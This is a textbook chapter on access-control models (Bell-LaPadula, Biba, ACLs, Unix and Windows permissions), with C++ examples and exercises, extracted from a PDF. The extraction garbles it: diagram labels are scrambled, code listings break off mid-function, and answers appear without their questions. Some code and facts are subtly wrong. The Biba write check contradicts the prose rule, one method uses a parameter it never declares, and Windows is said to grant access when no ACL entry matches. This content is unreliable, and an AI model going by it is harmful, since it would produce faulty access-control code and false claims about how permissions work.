a need was made to develop a confidentiality-based access control system to
provide the needed assurances.
David Bell and Len La Padula developed the Bell-LaPadula model in 1972 to meet
this need (Bell & LaPadula, 1973). Not only did they describe the data structures
and algorithms necessary to provide confidentiality assurances, but they also
developed the mathematical model and associated proofs. The core of the model
consists of the following components:
Security for Software Engineers | Unit 3: Privacy | Chapter 11: Access Control | 237
S Bell and LaPadula define this as subjects, namely “processes, programs in
execution.”
O These are objects or assets on the system to be protected.
C The classification of security levels. One of these would be Top Secret in the
military example.
A Access attributes, or a request to read or write to an object/asset.
R A request for access to an object. The access control system is to accept or deny
this request.
D Decision or the result of the request. This is a Boolean value.
Bell La-Padula
With this system, both an asset and a user are given clearances based on a linear
scale. At validation time, access is granted if the user possesses the same or
greater clearance than the asset. This has several outcomes:
Read-down An individual with a high clearance (e.g. Secret) can read documents of lower
permitted clearance (e.g. Confidential).
Write-down An individual possessing high clearance information (e.g. Top Secret) cannot
restricted write to a document of lower clearance (e.g. Public). Doing so would risk
disclosure of confidential information. Instead, either the sensitivity of the asset
is increased to that of the author, or the author is denied permission to write.
Read-up is An individual of low clearance (e.g. Secret) cannot read a document of higher
restricted clearance (e.g. Top Secret). To do so would yield disclosure.
Implementation
Implementations of the Bell-LaPadula include the following components: control,
asset control, subject control, security conditions, and integration.
Control
Bell and LaPadula defined control as “level of access.” Bell and LaPadula call this
“control,” a value that can easily be represented with an integer variable. By
convention, the higher the number, the more access is allowed. Thus 0 is defined
as “no access” or “most limited access.”
238 | Chapter 11: Access Control | Unit 3: Privacy | Security for Software Engineers
In our military example, we can represent control as an integer or an
enumeration. For example:
enum Control
{
UNCLASSIFIED, PUBLIC, CONFIDENTIAL, SECRET, TOP_SECRET
};
This variable is typically stored in a class associated with the asset to be protected.
It is typically set at object creation time and represents what level of control a
given user must have to access this asset.
Subject Control
Each subject wishing to obtain access to the asset is also given a control value Cs.
This value is assigned at authentication time. In other words, the purpose of the
authentication process in Bell-LaPadula is to assign a subject control to a given
user:
Control authenticate(string username, string password);
Recall that there are a finite number of control levels in a given Bell-LaPadula
system. In practice, there are rarely more than a half dozen. This means that the
authentication process assigns a potentially large number of possible users into a
very small number of control levels.
Back to our military example: the colonel has granted TOP_SECRET to himself and
fifteen members of his staff. These constitute the only people in the organization
who have access to every document in the system and can view the complete
battle plan. One of the members of the staff is Larry, a logistics specialist. When
Larry logs into the system, he is given exactly the same subject control value as
Security for Software Engineers | Unit 3: Privacy | Chapter 11: Access Control | 239
the colonel. In other words, all members of a given security level are treated
exactly the same in Bell-LaPadula.
Security Condition
The next part of the Bell-LaPadula system is to determine whether a given request
for asset access is to be accepted or rejected. This is called the security condition.
This condition takes two parameters (the subject control and the asset control)
and returns a Boolean value (allow access or not).
In the read condition, the security condition needs to verify that the level of the
subject is at least as large as that of the asset. This can be handled with a simple
greater-than or equal-to operation Cs ≥ Ca.
bool securityConditionRead(Control assetControl, /* asset */
Control subjectControl /* user */)
{
return subjectControl >= assetControl;
}
Notice that any requests to view a given asset will be rejected if the subject
control (the security clearance of the user) is not as high as that of the asset.
In the write condition, everything is opposite. Here the system needs to ensure
that confidential information is not leaked to untrusted subjects. What would
happen if someone possessing secrets let something slip? There are many
examples in U.S. history where a President mistakenly mentioned secret
information to a member of the public press! To protect against this eventuality,
Bell-LaPadula only allows subjects to write to assets that have at least the security
clearance as the subject. Back to our military example, this means that data from
untrusted sources can find itself in any asset in the system. However, the colonel
can only write to TOP_SECRET documents. This security condition can also be
handled with a simple less-than or equal-to operation: Cs ≤ Ca.
bool securityConditionWrite(Control assetControl, /* asset */
Control subjectControl /* user */)
{
return subjectControl <= assetControl; // opposite of the Read!
}
Notice how the write security condition is exactly opposite of the read condition.
240 | Chapter 11: Access Control | Unit 3: Privacy | Security for Software Engineers
Integration
To make an access control implementation sound, the programmer must put
security condition checks at all trust boundary junctions. In other words, every
avenue into and out of the asset must be checked. This will be demonstrated in
the context of a simple program to store a collection of military plans:
name
plan getPlan
name, plan
name addPlan
plan
l
PlanCollection
Figure 11.1: DFD of a class before any access control mechanisms are added
The code necessary to implement this simple program is the following: two
methods and one member variable.
class PlanCollection
{
public:
string getPlan(string name)
{
return plans[name];
}
void setPlan(string name, string plan)
{
plans[name] = plan;
}
private:
map <string /*name*/, string /*plan*/> plans;
};
Notice how all of the plans are stored in a single data structure: the plans map.
When a user asks for a plan by name through the getPlan() method, then a
string of the plan is returned. When a user adds a new plan to the collection with
the setPlan(), a new plan is added to the collection.
Here, no security mechanisms exist. A given plan can be retrieved or added
without any verification of the security level of the user. We will now retro-fit this
program with the Bell-LaPadula access control mechanism. There are two main
ways to do this: asset-level checks or collection-level checks.
Security for Software Engineers | Unit 3: Privacy | Chapter 11: Access Control | 241
Asset level checks involve placing security condition checks on the assets
themselves. In this case, we will add security checks on the plan. In our original
example, a plan was stored as a single string. Now it will be a class.
From this code we can see that the only access to the plan is through the two
public interfaces: get() and update(). This Plan class now resides in our
PlanCollections class:
plan
getPlan
name
name, plan
plan
name addPlan
PlanCollection
Figure 11.3: DFD of adding access control to a data structure embedded in a class
Notice how every instance of Plan is protected as it travels into and out of the
class. The PlanCollection container is unaware of the access control
mechanism. The code is:
242 | Chapter 11: Access Control | Unit 3: Privacy | Security for Software Engineers
class PlanCollection
{
… code removed for brevity …
map <string /*name*/, Plan> plans;
};
accessRights
name PlanCollection
private:
map <string, string> plans; // name of plan and the contents
map <string, Control> accessRights; // who can access a given plan
The data structure holding all the plans (the plans map) contains no access
control mechanisms whatsoever. Anyone who has access to the plans member
variable has complete access to all of the plans stored in the system. To protect
this asset, we have another map called accessRights. This carries all of the
access rights for every plan in the plans data structure. Now, when getPlan()
requests a plan, it will verify that the requester has the necessary rights:
string Plans::getPlan(const string & name, Control subject) const throw (char *)
{
Control control = accessRights[name]; // find the state of the control
Security for Software Engineers | Unit 3: Privacy | Chapter 11: Access Control | 243
Integrity
Bell-LaPadula makes confidentiality assurances to the user, but it makes no
integrity assurances. In other words, the most untrusted subject on the system
can write to every single asset in the system. How can the users of the system be
assured that everything has not been corrupted?
Consider the following scenario: a newspaper is collecting information from
various sources to create an article. It is the goal of the editor of the newspaper
to ensure that everything printed is accurate and true. In other words, only a
small portion of the collected data is fit for print. The rest must be treated as
rumor and left out of the article. To address this need, the editor has identified
several levels of trust:
Verified Facts are double-checked and ready to print.
Primary Information came from a first-hand account.
Secondary Information came from an expert in the field.
Preliminary Information came from an unverified source, but is probably true.
Unsubstantiated Information came from rumor, hunch, or intuition.
For example, a newspaper or a journal cares less about confidentiality than
integrity; they just need assurances that their works are of a known level of
quality.
Mathematical Model
Bell-LaPadula’s model only provided confidentiality assurances but did nothing to
ensure that the integrity of the system is protected. To address this need,
Kenneth J. Biba created the Biba model in 1975 (Biba, 1975). To do this, Biba
realized that integrity is essentially the same problem as confidentiality, only
reversed. This is why the Biba model is often called the Bell-LaPadula upside-
down.
s Bell and LaPadula define this as subjects, namely “processes, programs in
execution.” Biba defined this as a set of subjects, each individual subject
represented with a lowercase s.
o Bell and LaPadula defined this as objects or assets on the system to be
protected. Biba did the same, though again emphasizing that O represents a set
of objects, each individual member is the lowercase o.
I Bell and LaPadula defined classification levels as C whereas Biba defined
integrity levels as I. Though the meaning is completely different, they function
the same.
il A function returning the integrity level (I) for a given subject.
244 | Chapter 11: Access Control | Unit 3: Privacy | Security for Software Engineers
Biba
As with the Bell-LaPadula system, both an asset and a user are given trust levels
based on a linear scale. At validation time, write permission is granted if the user
possesses the same or greater level of trust as the asset. This has several
outcomes:
Read-down An individual with a high trust level (e.g. Secondary source) cannot read
restricted documents of lower levels of trust (e.g. Preliminary source). Doing so would run
the risk that incorrect or untrustworthy ideas would damage the integrity of the
new work.
Write-down An individual possessing high degree of trust (e.g. Primary source) can write to a
permitted document of lower clearance (e.g. Preliminary source). For example, a scientist
can write to a Wikipedia article.
Read-up is An individual of low clearance (e.g. Untrusted source) can read a document of
permitted higher trust (e.g. Primary source). For example, a member of the public can
read a scientific article.
Write-up is An individual of low trust (e.g. Preliminary source) is not allowed to write to a
restricted highly trusted document. In this case, the document’s trust level would have to
be lowered to match the author.
The Biba model also allows for auditing to detect and reverse errors as well as a
way to account for who made what changes to the data.
Implementation
As with the Bell-LaPadula model, there are many scenarios when one would wish
to implement Biba within a system to guarantee data integrity. Implementation
of the Biba model is similar to that of the Bell-LaPadula model: the integrity level,
the protection level, the control value, the security condition, and the integration
to the host system.
Integrity Level
The integrity level captures a notion of “level of trust.” Biba calls this “integrity
classes” and “integrity levels.” An integrity level can be easily represented with
an integer variable traditionally given the name IL. As with Bell-LaPadula’s control
variable, the integrity level is an integer.
Back to our newspaper example, one might define the integrity levels as the
following:
enum IntegrityLevel
{
UNSUBSTANTIATED, PRELIMINARY, SECONDARY, PRIMARY, VERIFIED
};
Security for Software Engineers | Unit 3: Privacy | Chapter 11: Access Control | 245
If we go back to our newspaper example, it should be relatively easy to assign
levels to various assets based on the level of confidence one has in the source.
There is one problem, however.
Consider the SECONDARY integrity level. In our scenario, this is defined as
“Information came from an expert in the field.” If an interview was collected from
a judge, then the interview will be assigned SECONDARY since the judge is an
expert in the field. However, as part of a later interview, the judge then talks
about technology. Though technology is not an area of her expertise, she still has
a SECONDARY integrity level. Therefore more weight is given to her opinion than
her station deserves. The problem with Biba, as it is with Bell-LaPadula, is that all
subjects with the same integrity level are treated the same.
Protection Level
The protection level is an assignment of an integrity level to a subject or asset O.
This protection level signifies the degree of confidence one can put in the subject
that the contents are trustworthy. Back to our newspaper example: a subject with
the PRELIMINARY protection level would treated with considerably more
skepticism than one with the VERIFIED protection level.
One can add a protection level to an asset by simply adding a member variable to
the structure or class:
IntegrityLevel protectionLevel;
As with the asset control component of the Bell-LaPadula model, the projection
level component of Biba is implemented as a single integer variable.
Control Value
Each subject wishing to obtain access to the asset (S) is given a control value (ILs).
This is obtained at authentication time. It works exactly the same as the subject
control mechanism of Bell-LaPadula except the result is an IntegrityLevel:
IntegrityLevel authenticate(string username, string password);
Observe that Biba makes no reference to individual users working on the system.
Instead, it deals only with a set of users, each of which defined by an integrity
level. Thus all primary sources are treated the same, as are all preliminary
sources.
Security Condition
Finally, at the point when access is requested by the subject of the asset (called
the “security condition”), the control value of the subject is compared against
that of the asset. As with Bell-LaPadula, the security condition returns a Boolean
value; one is either allowed to edit an asset or not.
246 | Chapter 11: Access Control | Unit 3: Privacy | Security for Software Engineers
The first type of security decision is one that determines whether a given subject
can edit a given object. This function takes two parameters: the integrity level of
the subject (called the control value) and the integrity level of the object (called
the protection level). If the subject (user) has sufficient credentials to edit the
object, then permission is granted. This can be handled with a simple greater-
than or equal-to operation ILo ≥ ILa.
bool securityConditionWrite(IntegrityLevel ilAsset /* asset */,
IntegrityLevel ilSubject /* user */)
{
return ilAsset >= ilSubject;
}
In order to verify that this works, consider a secondary source (expert in the field)
attempting to edit a given StoryData object that currently has a preliminary level
of trust. Since the subject has a sufficient level of trust, the security condition
should allow access. Here controlValue = SECONDARY and projectionLevel
= PRELIMINARY. Since the value of SECONDARY is 2 and the value of PRELIMINARY
is 1, we have sufficient credentials to edit the StoryData object.
The second decision is to see whether a given source user can view a given
StoryData object. In this case, we have the journalist who is writing the actual
story that will go in the newspaper. The journalist has decided that only
secondary sources are sufficient for his purposes. Therefore, his controlValue is
SECONDARY. The journalist begins by requesting all the data that pertains to the
story. In this case, there are 82 individual StoryData objects, each of which has
varying levels of protection. When the journalist looks at the data, however, there
are only 19 StoryData objects returned. This is because there are 4 objects with
a VERIFIED protection level, 10 with PRIMARY, and 5 with SECONDARY. All the rest
are PRELIMINARY or UNSUBSTANTIATED. Since the lowest integrity level of any
data going into the story is SECONDARY and since the journalist himself has the
SECONDARY control value, the resulting story is also SECONDARY. The function
performing this integrity check is:
bool securityConditionRead(IntegrityLevel ilAsset /* asset */,
IntegrityLevel ilSubject /* user */)
{
return ilAsset <= ilSubject;
}
Security for Software Engineers | Unit 3: Privacy | Chapter 11: Access Control | 247
Integration
To make an access control implementation sound, the programmer must put
security condition checks at all trust boundary junctions. This will be
demonstrated in the context of a simple program to store a collection of
newspaper articles:
name
story retrieve
name, story
name insert
story
StoryCollection
Figure 11.5: DFD of a class before access control mechanisms are added
The code necessary to implement this simple program is the following: two
methods and one member variable.
struct StoryCollection
{
public:
string retrieve(string name)
{
return stories[name];
}
void insert(string name, string story)
{
stories[name] = story;
}
private:
map <string /*name*/, string /*story*/> stories;
};
Of course no access control mechanisms yet exist with this simple container class.
We need to add checks at all the public methods in order to be able to make
integrity assurances to the user. This will be accomplished in much the same way
we added confidentiality assurances in our military plan example previously: we
will add asset-level checks and we will add collection-level checks.
Asset level checks involve placing security condition checks on the assets
themselves. In our newspaper story example, all assets are treated as a simple
string. We will change that to make an asset a class.
subject story
edits write plan
T/F
subject
story read security
T/F subject
integrityLevel
integrityLevel integrityLevel
Story integrityLevel
Story
Figure 11.6: DFD of a class with access control mechanisms
248 | Chapter 11: Access Control | Unit 3: Privacy | Security for Software Engineers
The implementation of the integration of the access control mechanism into the
Story class is very similar to what we did for the Plan class. In fact, the only
substantial difference is that the securityConditionRead() and
securityConditionWrite() are upside-down:
class Story
{
public:
Story(IntegrityLevel il) : ilAsset(il) {}
string read(IntegrityLevel ilSubject) const throw (char *)
{
if (!securityConditionRead(ilAsset, ilSubject)) throw "Read denied";
return this->story;
}
void write(string story, Control subject) throw (char *)
{
if (!securityConditionWrite(ilAsset, ilSubject)) throw "Write denied";
this->story = story;
}
private:
string story;
IntegrityLevel ilAsset;
bool securityConditionRead(IntegrityLevel ilAsset,
IntegrityLevel ilSubject) const;
bool securityConditionWrite(IntegrityLevel ilAsset,
IntegrityLevel ilSubject) const;
};
From this code we can see that the only access to the plan is through the two
public interfaces: read() and write(). This Story class now resides in our
StoryCollections class:
story read
name
name, story
story write
name
StoryCollection
Figure 11.7: DFD of a class with an embedded data structure containing access control mechanisms
Notice how every instance of Story is protected as it travels into and out of the
class. The StoryCollection container is unaware of the access control
mechanism. The code is:
class StoryCollection
{
… code removed for brevity …
map <string /*name*/, Story> stories;
};
Security for Software Engineers | Unit 3: Privacy | Chapter 11: Access Control | 249
The second way to integrate Biba is to place the security condition checks on the
container that manages all the assets. A data-flow diagram of this design is the
following (not that il refers to integrity level):
private:
map <string, string> stories;
map <string, Control> credentials;
bool securityConditionRead(IntegrityLevel ilAsset,
IntegrityLevel ilSubject) const;
bool securityConditionWrite(IntegrityLevel ilAsset,
IntegrityLevel ilSubject) const;
};
Since all public methods perform the appropriate security condition checks, we
can see that the Biba integrity assurances are met with this design.
250 | Chapter 11: Access Control | Unit 3: Privacy | Security for Software Engineers
Confidentiality & Integrity
While the Bell-LaPadula model might be sufficient for most system’s
confidentiality needs and while the Biba model might be sufficient for many
integrity needs, the two systems cannot coexist. This is particularly unfortunate
because most systems are required to make both confidentiality and integrity
assurances to the users.
For example, consider a music streaming service. This service allows individual
users to set up an account, containing billing information, music preferences,
account type, and a host of other settings. It turns out that there are two account
types: individual and family. The family account allows up to five additional users
to have access to the music though only the account owner can change the billing
information and other settings. Finally, there is an administrator who can both
read and write to any account in the system. As you can probably imagine, this
scenario involves a host of different confidentiality and integrity needs, many of
which cannot be easily placed in the confidentiality levels of Bell-LaPadula nor the
integrity levels of Biba.
ACLs
To address this need David Clark and David Wilson defined a model in 1987 that
provided the assurances of Bell-LaPadula and Biba in a single system: the Clark-
Wilson model (Clark & Wilson, 1987). This was accomplished by identifying a
collection of certification rules (CR1 through CR5) and a collection of enforcement
rules (ER1 through ER4). Confidentiality and integrity assurances can be made
through how transformation procedures are defined governing access to
constrained data items, each of which is expressed in terms of state transitions.
Unfortunately, the Clark-Wilson system proved difficult to implement and
configure. To address these challenges, ACLs were developed.
Access Control Lists (ACLs) are a mathematically equivalent system to the Clark-
Wilson, designed with the intention of being much easier to define and
implement. An ACL is a list of permissions (typically Read, Write, and Execute)
paired with entities (individual users or named user groups). When a resource is
accessed, the request (e.g. Bob to read) is compared against the ACL (e.g. Bob to
write, Teachers to read/write, administrators to read/write) to make an access
control determination (in this case “deny”). ACLs have several components:
SID A Security ID (SID) is the unique identification of an individual or a group.
ACE An Access Control Entry (ACE) is a SID paired with permission (Read or Write).
ACL An Access Control List (ACL) is a list of ACEs defining permissions to access a
given resource.
ACE Request An ACE representing the access permission requested by a subject.
Security Condition A function returning whether a given access request is to be granted, taking an
ACE Request and an ACL as parameters.
Security for Software Engineers | Unit 3: Privacy | Chapter 11: Access Control | 251
Implementation
To implement ACLs on a given system, it is necessary to implement all three data
structures: the SID, the ACE, and the ACL. From here, it is necessary to implement
the security condition and finally integrate the ACL mechanism into the system.
SID
Recall that a Security ID (SID) is the unique identification of an individual or a
group. There are two ways a SID can be identified: when a user is added to the
system or when a group is created. Typically when a user authenticates on a
system, the authentication function returns a SID. Note that a SID, just like most
IDs, is just an integer.
typedef short SID; // good for 64k users. Should be enough!
The difference between the SID of an ACL and the control of Bell-LaPadula is that
a SID can refer to individuals whereas the control variable refers to levels. Thus
the authentication mechanism of an ACL is quite different from that of Bell-
LaPadula or Biba:
SID sidUser = authenticate(string username, string password);
252 | Chapter 11: Access Control | Unit 3: Privacy | Security for Software Engineers
Notice how this ACE takes only 4 bytes (2 bytes for the SID, 1 byte for the read,
and 1 byte for the write). This is a very compact data structure.
As mentioned previously, some systems may have a very complex set of access
types. These too can be represented in a very compact format if we use a bit-field
to represent all the different flavors of access:
// different bit-fields representing varying levels of access
#define ACCESS_READ 0x01
#define ACCESS_WRITE 0x02
#define ACCESS_EXECUTE 0x04
#define ACCESS_MODIFY 0x08
#define ACCESS_NOT_READ 0x10
#define ACCESS_NOT_WRITE 0x20
#define ACCESS_NOT_EXECUTE 0x40
#define ACCESS_NOT_MODIFY 0x80
/********************************************************
* ACE
* A complex ACE where eight different levels of access
* are represented. To save space, each level of access
* is represented as a single bit so the entire access
* component of the class takes only a single byte.
********************************************************/
class ACE
{
public:
SID sid;
bool canRead() const { return (access & ACCESS_READ ); }
bool canWrite() const { return (access & ACCESS_WRITE ); }
bool canExecute() const { return (access & ACCESS_EXECUTE ); }
bool canModify() const { return (access & ACCESS_MODIFY ); }
bool canNRead() const { return (access & ACCESS_NOT_READ ); }
bool canNWrite() const { return (access & ACCESS_NOT_WRITE ); }
bool canNExecute() const { return (access & ACCESS_NOT_EXECUTE); }
bool canNModify() const { return (access & ACCESS_NOT_MODIFY ); }
Notice how the ACE is very small in memory, only a single char plus a short. Using
bit-wise operators saves a lot of space when the number of instances of a given
class is large.
Security for Software Engineers | Unit 3: Privacy | Chapter 11: Access Control | 253
ACL
The final data-structure associated with an ACL is the Access Control List (ACL)
itself. As you have probably figured out, the access control mechanism is named
after this data structure. An ACL is a list of ACEs defining permissions to access a
given resource. There are several parts of this definition. We will explore them
each in part.
An ACL First, an ACL is a list. This means that order matters. When we read an ACL, we
is a list do so from one side (usually from the head or from the lowest index) and
proceed to the end or until some end-condition is met. This means that an ACL
consisting of [ACE1, ACE2] is not the same thing as another ACL consisting of
[ACE2, ACE1].
The ACL Second, the ACL consists of ACEs. Recall that an ACE specifies an individual
consists of ACEs access specification. The collection of these specifications defines an ACL.
An ACL is attached Third, the ACL defines permission to access a given resource. This means that
to a resource an ACL is attached to a resource that is to be protected.
Some ACL implementations consist of a list of fixed size. This is true with the most
common file system implementation on UNIX and LINUX systems. Here, the ACL
always consists of three entries: user, group, and public.
For example, consider our music streaming service. One asset on this system may
be the billing information associated with a given account. Of course the account
owner (sidSam) will need to have read and write access to the data. The other
members of the account (sidSue, sidBabyCary, etc.) will not. However, the
billing service (sidBilling) will need to have read permission and the account
manager (sidSly) will need to have read and write permission. Also, the group
of users who provide customer support (sidCustomer) will have read and write
access. Finally, an auditing program (sidAudit) will periodically write a record to
the file but does not need to read. Thus the ACL for this item is the following:
Read,
sidSam
Write
sidBilling Read
Read,
sidSly
Write
Read,
sidCustomer
Write
sidAudit Write
254 | Chapter 11: Access Control | Unit 3: Privacy | Security for Software Engineers
ACE Request
When a subject such as a user or another part of the system requests access to a
given asset, the system generates an ACE request. As you can imagine, the data-
type of this is an ACE. The difference between an ACE request and an ACE residing
in an ACL is that the former represents a request for access while the latter
represents the state policy.
For example, consider the music streaming service example previously discussed.
In this case, Sam wishes to update his billing information with a new credit card
number. To do so, he creates an ACE request:
sidSam Write
From this ACE, it should be obvious that Sam is requesting permission to Write to
a given asset.
Security Condition
The next piece to the ACL system is the security condition. Recall that both Bell-
LaPadula and Biba used a security function to determine if a given subject had
permission to access an asset. ACLs use a similar function except there will not be
separate functions for read and write requests.
For example, consider the setCreditCard() method in a Billing class. This
function will need to know the credit card number that is to be applied to a given
account. It also needs to check that a given user has permission to make this
change.
void Billing :: setCreditCard(const CreditCard & newCard, SID sid)
{
ACE aceRequest(sid, false /*read*/, true /*write*/);
if (securityCondition(aceRequest, acl))
card = newCard;
}
Notice that the first thing this method does is to create an ACE request from the
SID. Since this function is a setter, we create an ACE with the “write” bit set to
true and the “read” bit set to false. Once this aceRequest is built, we can then
compare it to the ACL that is a member variable in the Billing class. If the
securityCondition() permission accepts this ACE request, then the credit card
information is updated.
Security for Software Engineers | Unit 3: Privacy | Chapter 11: Access Control | 255
So how does this securityCondition() function work? This depends a great
deal on how ACLs are implemented in the system. First, we will consider the
simplest possible scenario. Here, all the ACE permissions are positive. They
specify that one has the ability to read an asset, but they do not have the ability
to specify that one does not have the ability to read an asset. Also, there are no
notions of groups. In this case, the securityCondition() function might be
something like this:
/******************************************************************************
* SECURITY CONDITION
* Simplistic model with only one positive permission and no groups.
******************************************************************************/
bool securityCondition(const ACE & aceRequest, const ACL & acl)
{
for (int i = 0; i < acl.size(); i++) // loop through all the ACEs
if (acl[i].sid == aceRequest.sid) // does this ACE apply?
{
if (acl[i].read && aceRequest.read) // if it says we can read
return true; // and we try to read,
if (acl[i].write && aceRequest.write) // then return true
return true;
}
return false; // false if no permissions
} // were granted
This gets more complicated if we allow the client to request both a read and a
write at the same time. Here, a more robust security condition will be required:
/******************************************************************************
* SECURITY CONDITION
* Simplistic model with positive permission and no groups.
******************************************************************************/
bool securityCondition(const ACE & aceRequest, const ACL & acl)
{
bool readAllowed = false; // initially do not allow read or write
bool writeAllowed = false;
for (int i = 0; i < acl.size(); i++) // loop through all the ACEs
if (acl[i].sid == aceRequest.sid) // does this ACE apply?
{
if (acl[i].read) // we have READ permission
readAllowed = true;
if (acl[i].write) // we have WRITE permission
writeAllowed = true;
}
The next level of complication occurs when we add groups to the mix. Here, we
need to be able to tell if a given SID is a member of a group, and we need to be
able to tell if a given SID represents a group. Both of these conditions need to be
checked.
256 | Chapter 11: Access Control | Unit 3: Privacy | Security for Software Engineers
To do this, we will need two functions:
bool isGroup(SID sid);
bool isMember(SID sidUser, SID sidGroup);
From here, we can create a function to see if a given SID from an ACE request
(sidRequest) pertains to a given SID in an ACE residing in an ACL (sidACL).
bool sidMatch(const SID & sidRequest, const SID & sidACL)
{
// sidRequests should come from individuals, not groups
assert(!isGroup(sidRequest));
// if both SIDs are the same, either individuals or groups, then they match
if (sidRequest == sidACL)
return true;
for (int i = 0; i < acl.size(); i++) // loop through all the ACEs
if (sidMatch(aceRequest.sid, acl[i].sid)) // does this ACE apply?
{
if (acl[i].read) // we have READ permission
readAllowed = true;
if (acl[i].write) // we have WRITE permission
writeAllowed = true;
}
Security for Software Engineers | Unit 3: Privacy | Chapter 11: Access Control | 257
Unix and Windows
On Unix platforms (Linux, OSX, etc.), ACLs are a list of three ACEs: User, Group,
and Public. Each ACE can have three permission types: Read, Write, and Execute.
Consider the following ACL:
drwxr-xr-- 11 JamesNH faculty 4096 May 26 15:14 cs470
The first letter (d) signifies the resource is a directory. The next three (rwx)
indicate that the user (JamesNH in this case) has Read, Write, and Execute
privileges. The next three (r-x) indicate the group (faculty in this case) has Read
and Execute privileges. The final three (r--) indicates everyone on the system has
read permissions. At validation time, permission is granted by comparing the ACE
request against the ACL policy. This is accomplished by comparing each item in
the ACL with the ACE of the request. If permission requested by the ACE is
validated by the ACL, then the resource request is granted. If, for example, a
member of the faculty group were to try to write to the directory, then the
request ACE [faculty, -w-] would be created. It would first be compared against
the owner component of the ACL [JamesNH, rwx] and the SID mismatch would
yield non-validation. Next, it would be compared against the group component
of the ACL [faculty, r-x]. Since the SID would match, permission would be
requested. The lack of the Write bit would result in a denial. The public ACE would
never be checked.
Access Control is a bit more complex on the Microsoft Windows NT platform.
There, an ACL can either allow the request of a resource (e.g. Read = Allow),
explicitly deny a request (e.g. Read = Deny), or not specify (e.g. Read =). In this
case, the order in which the ACL is read becomes important. For the example
below, the ACEs in the ACL are: {Authenticated Users, SYSTEM,
Administrators, and Users=HELFRICHJ}. The verification engine begins at the
start of the ACL. If an item in the ACL (an ACE of course) explicitly allows or denies
access to the resource, then that permission is returned and the loop terminates.
If all the entries in the ACL are checked and no specific permissions are
mentioned, then the request is granted.
258 | Chapter 11: Access Control | Unit 3: Privacy | Security for Software Engineers
Examples
1. Q Name the form of access control that would be appropriate in the following
scenario: I am posting information for my business on a publicly available web
site.
A Integrity. Since everyone has read access, there are no confidentiality concerns.
I am only striving to make sure the information is accurate.
2. Q Name the form of access control that would be appropriate in the following
scenario: At the end of the semester, I clean out my notebook by throwing
everything into the trash can.
3. Q Name the form of access control that would be appropriate in the following
scenario: I post some pictures from last night’s party on Facebook.
A Confidentiality & Integrity. I hope that only the people involved in the party and
perhaps my friends should have access to the pictures. Most people do not take
this step, but they should! Additionally, I hope that others do not alter my
pictures or text to make me look bad. Integrity assurances should address this
issue.
A Either physical or administrative. It is physical because the cleaning crew can get
access to the library with keys after hours. It is administrative because the
“guards” at the entrances will not let you in if you look like you will pose a threat
to the people inside.
A At first this appears to have no access control mechanism. However, the police
will remove you from the park if you are violating the rules. This is
administrative.
Security for Software Engineers | Unit 3: Privacy | Chapter 11: Access Control | 259
7. Q Consider a program designed to store a collection of addresses where each
address is accessed by name. A class called “Addresses” contains this list,
allowing the client to get the address with a call to the Address::get() method
and allowing the client to modify a given entry with the Address:set()
method. Our assignment is to modify the program to provide confidentiality
assurances.
260 | Chapter 11: Access Control | Unit 3: Privacy | Security for Software Engineers
8. Q Consider a program designed to store a collection of addresses where each
address is accessed by name. Our assignment is to modify the program to
provide integrity assurances.
A The obvious choice is the Biba model. First, we need to assign trustworthiness
levels to various uses:
Integrity Level Subject
PRIMARY God, ChuckNorris
SECONDARY President, Professor
PRELIMINARY Student, Parent, Batman
UNTRUSTED Everyone else
Next, we need to set the integrity level to various assets:
Control Asset
PRIMARY WhiteHouse, King
SECONDARY NYSE, OperaHouse
PRELIMINARY HollywoodSign, Dr.Helfrich
UNTRUSTED BatCave, Hogwarts
The final step is to modify the code to add the necessary access checks. We will
need to authenticate the user to obtain an integrity level based on the
username. We will need to add an IL variable to all the address data items.
Finally, at modification time (the Address::set() method), we need to verify
that the user has access to the asset. The security decision is made in the
securityCondition() method:
bool Addresses :: securityCondition(const IntegrityLevel & ilAsset,
const IntegrityLevel & ilSubject)
{
return ilAsset >= ilSubject;
}
Security for Software Engineers | Unit 3: Privacy | Chapter 11: Access Control | 261
9. Q Consider a program designed to store a collection of addresses where each
address is accessed by name. A class called “Addresses” contains this list,
allowing the client to get the address with a call to the Address::get() method
and allowing the client to modify a given entry with the Address:set()
method. Our assignment is to modify the program to provide confidentiality
assurances.
A The obvious choice is ACLs. We will do this Linux style with a fixed ACL length of
3. This means that the three ACEs in each ACL will be owner, group, and public.
Thus, we need to start by identifying our groups. We will create two:
superheroes and leaders:
Superheroes Leaders
God God
ChuckNorris ChuckNorris
Batman Batman, President, Professor, Parent
Next, we will need to determine ACLs for every asset.
Asset owner group public
Batcave Batman RW Superheroes RW Public --
Hogwarts Dumbledore R- Superheroes RW Public --
HollywoodSign CityLA RW Superheroes RW Public R-
Dr.Helfrich Helfrich RW Leaders RW Public R-
WhiteHouse President R- Superheroes RW Public R-
NYSE InterExc RW Leaders RW Public R-
OperaHouse SydneyOpera RW Leaders RW Public R-
From this table, we can see that the President knows where the White House is,
but cannot change that location. We can also see that Intercontinental Exchange
owns the New York Stock Exchange (NYSE) and is both aware of the location and
can change the location. That location is also public knowledge. Batman knows
the location of the Batcave and can change it, as can God and Chuck Norris. The
public neither can change the location nor knows the location. The final step is
to modify the code to add the necessary access checks. We will need to
authenticate the user to obtain a subject control based on the username. We
will need to add a control variable to all the address data items. Finally, at access
time (the Address::get() method and Address:set() method), we need to
verify that the user has access to the asset. The security decision is made in the
securityCondition() method:
262 | Chapter 11: Access Control | Unit 3: Privacy | Security for Software Engineers
bool Addresses :: securityCondition(const ACL & aclAsset,
const ACE & aceRequest) const
{
// try owner first
if (aceRequest.sid == aclAsset.owner.sid)
{
if (aceRequest.read)
return aclAsset.owner.read;
if (aceRequest.write)
return aclAsset.owner.write;
assert(false); // we should never be here!
return false;
}
Security for Software Engineers | Unit 3: Privacy | Chapter 11: Access Control | 263
Exercises
1 Name the form of access control that would be appropriate in the following
scenarios:
x I record private thoughts in my journal every night.
x A politician makes a speech representing his foreign policy views on the
Middle East.
x I would like to collaborate with my teammates on a group project.
4 The root of the Bell-LaPadula access control model is their definition of security.
Find their definition of security in the paper and paraphrase it in your own
words.
264 | Chapter 11: Access Control | Unit 3: Privacy | Security for Software Engineers
5 Define the following variables in the Bell-LaPadula model
xS
xO
xC
xK
xA
xR
xD
6 Define the C++ data structure(s) necessary to represent the Bell-LaPadula notion
of access control.
8 Define the C++ data structure(s) necessary to represent the Biba notion of
control.
Security for Software Engineers | Unit 3: Privacy | Chapter 11: Access Control | 265
9 Which of the following concepts match the ACL model:
x Data integrity
x State transitions
x Read down prohibited
x Read, write, execute
x Write up allowed
x A number of states
x ACE, SID
x Read down allowed
x Certification rules
